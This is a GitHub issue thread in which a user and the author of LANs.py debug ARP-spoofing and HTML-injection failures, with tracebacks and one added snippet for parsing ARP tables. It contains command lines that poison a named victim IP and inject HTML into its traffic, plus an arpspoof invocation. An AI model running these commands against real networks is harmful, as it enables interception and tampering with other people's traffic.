Comments (11)

DanMcInerney avatar DanMcInerney commented on July 24, 2024

Fixed, was missing a variable existence test. Surprised nobody else ever mentioned this one.

from lans.py.

mifau avatar mifau commented on July 24, 2024

After the fix, there is no error message, but nothing is happening either.
Like injection is not working at all:(

After a few trials and deciding to exit (ctrl+c) I got:
[*] Flushed firewall and forwarded traffic to the queue; waiting for data

^Clearing iptables, sending healing packets, and turning off IP forwarding...

(which is obvious) but needed to wait for like 20-30 seconds to be dropped to shell.

And then….my router connection (from any device in the network) is dead.
When I run LANs.py again, I’ll get:

./LANs.py -u -d -p -ip 192.168.0.15

[*] Checking the DHCP and DNS server addresses...
[*] Active interface: wlan1
[*] DHCP server: 192.168.0.1
[*] DNS server:
[*] Local domain: None
[*] Router IP: 192.168.0.1
[*] Victim IP: 192.168.0.15
[-] Router did not respond to ARP request for MAC, attempting to pull the MAC from the ARP cache
[*] Router MAC: wlan1
[*] Victim MAC:
[*] Enabled IP forwarding
[*] Flushed firewall and forwarded traffic to the queue; waiting for data

Traceback (most recent call last):
File "./LANs.py", line 1119, in <module>
main(parse_args())
File "./LANs.py", line 1115, in main
Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
File "./LANs.py", line 119, in poison
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 251, in send
__gen_send(conf.L3socket(*args, **kargs), x, inter=inter, loop=loop, count=count,verbose=verbose, realtime=realtime)
File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 234, in __gen_send
s.send(p)
File "/usr/lib/python2.7/dist-packages/scapy/arch/linux.py", line 387, in send
sx = str(ll(x))
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 261, in __str__
return self.build()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 319, in build
p = self.do_build()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 311, in do_build
pay = self.do_build_payload()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 303, in do_build_payload
return self.payload.do_build()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 308, in do_build
pkt = self.self_build()
File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 299, in self_build
p = f.addfield(self, p, val)
File "/usr/lib/python2.7/dist-packages/scapy/fields.py", line 70, in addfield
return s+struct.pack(self.fmt, self.i2m(pkt,val))
File "/usr/lib/python2.7/dist-packages/scapy/fields.py", line 183, in i2m
return mac2str(x)
File "/usr/lib/python2.7/dist-packages/scapy/utils.py", line 244, in mac2str
return "".join(map(lambda x: chr(int(x,16)), mac.split(":")))
File "/usr/lib/python2.7/dist-packages/scapy/utils.py", line 244, in <lambda>
return "".join(map(lambda x: chr(int(x,16)), mac.split(":")))
ValueError: invalid literal for int() with base 16: 'wlan1'

Every computer in the network has destroyed arp table from now:
CBP:~ mifau$ arp -an
? (192.168.0.1) at (incomplete) on en1 ifscope [ethernet]
? (192.168.0.11) at on en1 ifscope [ethernet]
? (192.168.0.17) at on en1 ifscope [ethernet]

So…thing got worse unfortunately:(
btw. I had to restart my wireless router in order to be able to use it again :) So…nice new feature;)) (DDoS)

from lans.py.

DanMcInerney avatar DanMcInerney commented on July 24, 2024

Not sure what the first problem you described was where it wouldn't show anything but the network problem was probably a problem with how it was reading your arp cache. I'm probably not parsing it accurately for when there's multiple entries. I made that a manual yes/no question now and if the router doesn't respond to the ARP packet asking what its MAC address is, well, not much within the scripts power to fix that. Also reinstated a more reliable code injection technique which has proved to be better than the recent change I made.

from lans.py.
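
Added example, not LANs.py's own code and not part of any comment in this thread: the traceback above ends with the interface name `wlan1` being handed to scapy as a MAC address, and the reply attributes that to how the ARP cache was read. Assuming the net-tools `arp -n` column layout and a constructed table, the hypothetical `naive_lookup` shows how positional parsing returns the interface name for an `(incomplete)` row, while the hypothetical `safe_lookup` validates the value and returns `None` so the caller can stop before building any packet.

```python
import re

# Six colon-separated hex octets; anything else is not a usable MAC.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")

# Constructed sample in net-tools `arp -n` layout (not captured from the thread).
# An unresolved entry has no HWtype and no Flags column, so its fields shift left.
SAMPLE_ARP_N = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.1                      (incomplete)                              wlan1
192.168.0.15             ether   02:00:00:aa:bb:15   C                     wlan1
192.168.0.1              ether   02:00:00:aa:bb:01   C                     eth0
"""


def naive_lookup(table, ip):
    """Positional parsing: third column of the first row matching ip."""
    for line in table.splitlines()[1:]:
        cols = line.split()
        if cols and cols[0] == ip:
            return cols[2]  # 'wlan1' for an (incomplete) row
    return None


def safe_lookup(table, ip, iface=None):
    """Return a validated, lower-cased MAC for ip (optionally on iface), else None."""
    for line in table.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 3 or cols[0] != ip:
            continue
        if iface is not None and cols[-1] != iface:
            continue  # same IP cached on another interface
        macs = [c for c in cols[1:] if MAC_RE.match(c)]
        if macs:
            return macs[0].lower()
        # (incomplete) row: keep scanning, there may be further entries
    return None


if __name__ == "__main__":
    print("naive:", naive_lookup(SAMPLE_ARP_N, "192.168.0.1"))
    print("safe :", safe_lookup(SAMPLE_ARP_N, "192.168.0.1", iface="wlan1"))
```
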

mifau avatar mifau commented on July 24, 2024

./LANs.py -i wlan1 -c '<title>OWNED</title>' -ip 192.168.0.15
[*] Checking the DHCP and DNS server addresses...
[*] Active interface: wlan1
[*] DHCP server: 192.168.0.1
[*] DNS server:
[*] Local domain: None
[*] Router IP: 192.168.0.1
[*] Victim IP: 192.168.0.15
[*] Router MAC:
[*] Victim MAC:
[*] Enabled IP forwarding
[*] Flushed firewall and forwarded traffic to the queue; waiting for data

[+] Searched analytics.supplyframe.com: {term_enc}|contextualmatch=nolimitation|cookietax=0|ectime={ectime}|ecstatus={ecstatus}|manufacturer={manufacturer_enc}|part_number={part_number_enc}|cb=adaff6bb28|h_value=8ed76ae9aa262b6c1388847607|h_crc=4057766122|geo=pl|bp=0.3964400050932|bpf=0.058672434770854|cp=5
[+] Searched analytics.supplyframe.com: {term_enc}|contextualmatch=nolimitation|cookietax=0|ectime={ectime}|ecstatus={ecstatus}|manufacturer={manufacturer_enc}|part_number={part_number_enc}|cb=da070bd22e|h_value=3b42e9783d1725271388847607|h_crc=4057766122|geo=pl|bp=0.24158519025005|bpf=0.00078895482151116|cp=5
[+] Searched analytics.supplyframe.com: {term_enc}|contextualmatch=nolimitation|cookietax=0|ectime={ectime}|ecstatus={ecstatus}|manufacturer={manufacturer_enc}|part_number={part_number_enc}|cb=d25439bb28|h_value=66886edae145a0261388847607|h_crc=4057766122|geo=pl|bp=0.83614066339603|bpf=0.11406096361848|cp=5
[+] Searched analytics.supplyframe.com: {term_enc}|contextualmatch=nolimitation|cookietax=0|ectime={ectime}|ecstatus={ecstatus}|manufacturer={manufacturer_enc}|part_number={part_number_enc}|cb=b83a1301f4|h_value=f7588fbbcebe68b21388847607|h_crc=4057766122|geo=pl|bp=0.020458405252927|bpf=0.3107896090535|cp=5
[+] Searched 1.gravatar.com: 114

I was browsing http://hackaday.com with iPhone (iOS7).
Other pages which I was opening….didn't give me any messages.

And now….. when I hit CTRL+C !... No arp tables problems anymore in other computers…but my phone has not got internet access by that wifi anymore. So I assume that it's still not being cleaned properly.
I've fixed that by running and quitting: arpspoof -i wlan1 -t 192.168.0.15 192.168.0.1. (So I'm probably right about that it's something with sending "healing" packets after CTRL+C).
I believe it may have something common with dns spoofing (in my case dns != router)...

I'm running LANs.py on Raspberry Pi (with quite hard modified PWNPi3.0 , with rtl8187 and rt5370 cards - wlan1 is rtl8187).
Ettercap didn't work for me (I mean filters which weren't changing incoming remote packages - as I understood It's common issue) so I've decided to check LANs.py. Sniffing is working great and I wanted to check html injection….as there is no other good alternative.
I can provide any information needed to verify what's wrong with my setup.
We can move private (if you don't want to make a mess here)...

from lans.py.

mifau avatar mifau commented on July 24, 2024

Sorry for spamming here, but….

[!] Injected HTML into packet for ….

:)
I just have reconfigured my wifi network to have same DNS IP == ROUTER IP.

And with such a settings "arp healing" is working ok also!

So there must be something connected with that (dns ip != router ip).

from lans.py.

DanMcInerney avatar DanMcInerney commented on July 24, 2024

Ah beautiful, looking into it.

from lans.py.

DanMcInerney avatar DanMcInerney commented on July 24, 2024

I think I got it, it was doing some bad logic when looking for the dnsMAC.

from lans.py.

mifau avatar mifau commented on July 24, 2024

For ROUTER != DNS:

./LANs.py -i wlan1 -c '<title>!!!!!!!</title>' -ip 192.168.0.15

I haven't got any injections:( (No messages, no action at all - but I can't check, at the moment, if victim was poisoned)

After CTRL+C and running it for a second time I got:

[*] Checking the DHCP and DNS server addresses...
[*] Active interface: wlan1
[*] DHCP server: 192.168.0.1
[*] DNS server: ……………...
[*] Local domain: None
[*] Router IP: 192.168.0.1
[*] Victim IP: 192.168.0.15
[*] Router MAC: …………………..
[*] Victim MAC: …………………...
[*] Enabled IP forwarding
[*] Flushed firewall and forwarded traffic to the queue; waiting for data

^Clearing iptables, sending healing packets, and turning off IP forwarding...
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr
callback failure !
sys.excepthook is missing
lost sys.stderr

The good news is that after exit, every computer/smartphone in the network was working ok.

The thing could be (but I doubt as it was working before) that my dns!=router network is WPA2 network.
The opened network is working great (and CTRL+C is also working as it should….so don’t change there anything!).

And Dan…. you’re incredible with all that quick changes! Tnx!
Keep on doing the great job, especially as there is no working alternative!

from lans.py.

DanMcInerney avatar DanMcInerney commented on July 24, 2024

I realized that since I recently redid the DNS spoofing to be 100% reliable, I also removed the one part of the code that actually depended on getting the DNS server's MAC address. I just pulled out the DNS MAC code entirely. That being said, I wasn't actually able to replicate the problem once I got on a network where I could adjust the DNS settings. I'm using NetworkManager on Kali.

from lans.py.

DanMcInerney avatar DanMcInerney commented on July 24, 2024

I'm trying to figure out what might be causing that callback failure... I'm thinking the only callbacks I'm using that could come that fast are process_pending(), Parser(args).start() (both of which are from nfqueue) and the reactor. Thinking this is probably twisted's reactor callback on Queued.doRead().

What version of nfqueue-bindings and python-twisted do you have?

from lans.py.

DanMcInerney avatar DanMcInerney commented on July 24, 2024

Taking the lack of response to imply resolution. Please don't hesitate to update this issue if you're still seeing problems and I will work on it.

from lans.py.
